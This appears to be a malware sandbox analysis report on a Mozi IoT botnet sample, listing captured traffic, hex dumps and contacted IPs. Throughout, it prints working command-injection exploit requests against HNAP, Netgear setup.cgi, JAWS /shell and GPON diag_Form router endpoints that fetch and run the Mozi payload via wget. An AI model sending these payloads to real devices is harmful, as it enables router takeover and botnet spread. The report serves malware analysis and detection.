76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 85.214.105.212:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.210.67.167:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 103.47.16.235:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Sample listens on a socket

Source: /tmp/i (PID: 4585)

Socket: 0.0.0.0::57738

Jump to behavior

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 180.242.224.123
Source: unknown	TCP traffic detected without corresponding DNS query: 134.208.96.106
Source: unknown	TCP traffic detected without corresponding DNS query: 194.120.187.83
Source: unknown	TCP traffic detected without corresponding DNS query: 17.226.218.78
Source: unknown	TCP traffic detected without corresponding DNS query: 167.35.185.166
Source: unknown	TCP traffic detected without corresponding DNS query: 185.252.99.21
Source: unknown	TCP traffic detected without corresponding DNS query: 108.93.69.18
Source: unknown	TCP traffic detected without corresponding DNS query: 25.17.15.19
Source: unknown	TCP traffic detected without corresponding DNS query: 204.33.51.57
Source: unknown	TCP traffic detected without corresponding DNS query: 126.140.98.187
Source: unknown	TCP traffic detected without corresponding DNS query: 17.103.148.14
Source: unknown	TCP traffic detected without corresponding DNS query: 173.46.232.71
Source: unknown	TCP traffic detected without corresponding DNS query: 9.23.193.235
Source: unknown	TCP traffic detected without corresponding DNS query: 148.8.199.238
Source: unknown	TCP traffic detected without corresponding DNS query: 191.194.67.143
Source: unknown	TCP traffic detected without corresponding DNS query: 95.42.94.59
Source: unknown	TCP traffic detected without corresponding DNS query: 83.186.9.176
Source: unknown	TCP traffic detected without corresponding DNS query: 74.222.223.162
Source: unknown	TCP traffic detected without corresponding DNS query: 7.209.72.35
Source: unknown	TCP traffic detected without corresponding DNS query: 191.19.130.89
Source: unknown	TCP traffic detected without corresponding DNS query: 174.116.188.92
Source: unknown	TCP traffic detected without corresponding DNS query: 60.49.142.109
Source: unknown	TCP traffic detected without corresponding DNS query: 94.90.118.217
Source: unknown	TCP traffic detected without corresponding DNS query: 199.86.216.179
Source: unknown	TCP traffic detected without corresponding DNS query: 194.171.127.193
Source: unknown	TCP traffic detected without corresponding DNS query: 115.153.49.223
Source: unknown	TCP traffic detected without corresponding DNS query: 175.130.144.51
Source: unknown	TCP traffic detected without corresponding DNS query: 199.129.123.23
Source: unknown	TCP traffic detected without corresponding DNS query: 194.70.177.118
Source: unknown	TCP traffic detected without corresponding DNS query: 196.157.245.80
Source: unknown	TCP traffic detected without corresponding DNS query: 33.184.214.99
Source: unknown	TCP traffic detected without corresponding DNS query: 20.162.238.193
Source: unknown	TCP traffic detected without corresponding DNS query: 75.245.97.93
Source: unknown	TCP traffic detected without corresponding DNS query: 222.170.3.234
Source: unknown	TCP traffic detected without corresponding DNS query: 76.4.181.236
Source: unknown	TCP traffic detected without corresponding DNS query: 89.135.205.190
Source: unknown	TCP traffic detected without corresponding DNS query: 187.136.236.154
Source: unknown	TCP traffic detected without corresponding DNS query: 153.172.56.219
Source: unknown	TCP traffic detected without corresponding DNS query: 187.68.238.155
Source: unknown	TCP traffic detected without corresponding DNS query: 172.196.147.205
Source: unknown	TCP traffic detected without corresponding DNS query: 82.90.22.100
Source: unknown	TCP traffic detected without corresponding DNS query: 105.46.196.121
Source: unknown	TCP traffic detected without corresponding DNS query: 141.101.65.109
Source: unknown	TCP traffic detected without corresponding DNS query: 135.216.63.34
Source: unknown	TCP traffic detected without corresponding DNS query: 101.207.79.110
Source: unknown	TCP traffic detected without corresponding DNS query: 152.131.171.80
Source: unknown	TCP traffic detected without corresponding DNS query: 39.230.188.152
Source: unknown	TCP traffic detected without corresponding DNS query: 108.180.252.214
Source: unknown	TCP traffic detected without corresponding DNS query: 146.171.127.198
Source: unknown	TCP traffic detected without corresponding DNS query: 133.188.108.105

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 167.82.102.91:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 139.162.182.70:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.214.76.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 178.88.225.33:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.249.130.85:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: dht.transmissionbt.com

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 15312Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 31 33 39 2e 33 39 2e 31 34 30 2e 32 38 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 23 63 7b 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 6d 61 72 67 69 6e 3a 32 30 3b 70 61 64 64 69 6e 67 3a 32 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 0a 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 0a 68 32 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 7d 0a 68 31 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 68 32 7b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 7d 0a 68 33 7b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 35 7b 6d 61 72 67 69 6e 3a 32 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 62 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0a 3c 64 69 76 20 69 64 3d 22 63 22 3e 0a 3c 68 31 3e 0a 3c 69 6d 67 20 77 69 64 74 68 3d 22 32 30 30 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 67 41 41 5a 41 42 6b 41 41 44 2f 32 77 42 44 41 42 41 4c 43 77 73 4d 43 78 41 4d 44 42 41 58 44 77 30 50 46 78 73 55 45 42 41 55 47 78 38 58 46 78 63 58 46 78 38 65 46 78 6f 61 47 68 6f 58 48 68 34 6a 4a 53 63 6c 49 78 34 76 4c 7a 4d 7a 4c 79 39 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 44 2f 32 77 42 44 41 52 45 50 44 78 45 54 45 52 55 53 45 68 55 55 45 52 51 52 46 42 6f 55 46 68 59 55 47 69 59 61 47 68 77 61 47 69 59 77 49 78 34 65 48 68 34 6a 4d 43 73 75 4a 79 63 6e 4c 69 73 31 4e 54 41 